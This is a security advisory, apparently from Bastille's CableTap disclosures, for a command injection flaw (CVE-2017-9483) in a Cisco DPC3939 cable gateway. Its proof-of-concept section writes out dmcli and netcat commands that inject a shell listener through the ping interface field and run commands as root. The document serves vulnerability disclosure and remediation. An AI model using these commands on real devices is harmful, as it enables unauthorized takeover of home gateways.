Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CableTap/doc/advisories/bastille-26.arbitrary-command-execution.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
55 lines (24 sloc)
1.87 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bastille Tracking Number 26 | |
| CVE-2017-9483 | |
| Overview | |
| A vulnerability has been discovered that enables an attacker to execute arbitrary commands on the application processor (ARM) Linux instance on a gateway. | |
| Affected Platforms | |
| Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST | |
| Proof-of-Concept | |
| Once an attacker has gained Telnet root on the network processor (Atom) Linux instance on a gateway (Bastille Tracking Number 25), it is possible to execute arbitrary commands on the application processor (ARM) Linux instance. | |
| The most recent firmware fixed a web UI command injection vulnerability affecting the ping command, however a DBus accessible version of the vulnerability remains. | |
| When the gateway executes a ping command, it does so by calling the ping binary on the AP CPU. It is possible to inject up to 13 characters of shell commands into the interface field of the ping command, which then get executed on the AP CPU. | |
| Executing the following three commands will first create a netcat listener on the AP CPU, and then inject the command "touch /tmp/test": | |
| dmcli eRT setv Device.IP.Diagnostics.IPPing.Interface string "\`nc -lp9|sh\`" | |
| dmcli eRT setv Device.IP.Diagnostics.IPPing.DiagnosticsState string Requested | |
| echo "touch /tmp/test" | nc 10.0.0.1 9 | |
| This technique can be used to gain a root shell on the AP CPU by disabling the firewall and starting a new Dropbear instance. | |
| Test Environment | |
| Cisco DPC3939, firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST | |
| Mitigation | |
| There is no apparent mechanism to allow Comcast customers to prevent access to the NP internal IP address or control the Telnet server. | |
| Recommended Remediation | |
| Update the firewall rules to prevent access to the NP internal IP address from the LAN, and add input validation to the interface field. | |
| Credits | |
| Marc Newlin and Logan Lamb, Bastille | |
| Chris Grayson, Web Sight.IO |